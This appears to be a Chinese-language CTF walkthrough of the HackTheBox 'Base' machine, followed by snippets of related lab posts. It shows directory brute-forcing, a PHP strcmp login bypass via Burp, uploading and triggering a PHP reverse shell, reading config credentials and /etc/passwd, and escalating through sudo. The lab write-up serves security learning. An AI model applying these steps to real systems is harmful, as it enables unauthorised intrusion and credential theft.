HTB靶機 base實戰分享

2021-10-04 16:11:42 字數 1465 閱讀 4405

首先掃瞄開放埠和服務。

可以看到開放埠是22和80,機器是linux的。

先上工具掃一波目錄:python3 dirsearch.py -u -e *

gobuster dir -u -w /usr/share/wordlists/dirb/big.txt

爆破得到有用的目錄為:_uploaded  login

直接訪問:/login/

目錄配置錯誤,可以直接列出。

web伺服器正在使用strcmp來檢查使用者名稱和密碼,這是不安全的,可以輕鬆地繞開。讓我們開啟burp並捕獲登入請求。以下**存在問題:

if (strcmp($password, $_post['password']) == 0) {

if (strcmp($username , $_post['username']) == 0) {

burp捕捉登陸請求,修改post的引數為:username=admin&password=admin

順利登陸:

上傳kali自帶的php shell:/usr/share/webshells/php/php-reverse-shell.php

上傳之後沒檔案路徑,加上之前掃瞄出來的目錄,瀏覽器訪問執行,本地監聽:/_uploaded/php-reverse-shell.php

看一下web的配置檔案:cat /var/www/html/login/config.php

<?php

$username = "admin";

$password = "thisisa***xpassword";

我們還可以閱讀/etc/passwd以找到使用者名稱john。結合這兩個。讓我們公升級到pty shell。

python -c 'import pty; pty.spawn("/bin/bash")'

su jhon

拿到user.txt

sudo -l

看來我們可以將find作為sudo 執行。

拿到root.txt

剛開始分享乙個比較基礎的靶機,之後會從慢慢深入。

Vulnhub靶機實戰 DC 2

描述 靶機dc 2共有5個flag,最終需要root許可權 才可以找到並檢視flag 環境 vmware虛擬機器軟體 1.檢視ip nmap sp 192.168.1.0 24 檢視ip nmap a 192.168.1.146 這裡我的靶機ip是146 2.瀏覽器訪問 發現無法正常訪問頁面,但在u...

Vulnhub靶機實戰(二) DC 2

開始拿flag 肯定是要先掃瞄ip了,依舊是使用nmap 只掃瞄到了80埠,瀏覽器開啟頁面來進一步收集資訊,頁面上已經說明了這是乙個wordpress站點。直接可以得到乙個flag 找不到有用資訊了,用wpscan掃瞄一下吧簡要介紹一下,wpscan是一款針對wordpress的安全掃瞄軟體 wps...

信安學習之路 CTF 靶機實戰

興趣使然,閒暇之餘對web安全方面進行了初步了解,如今也算是堪堪入門。學習了有一段時間,找一些ctf入門題目和靶機練手。註冊賬戶,登入之後頁面以暗黑風格為主的科技風。平台主要以挑戰為主,獲取每道題的flag,提交之後便算通過並給予積分獎勵,同時賬戶可以憑積分提公升排行榜所在排名。挑戰模組 web 應...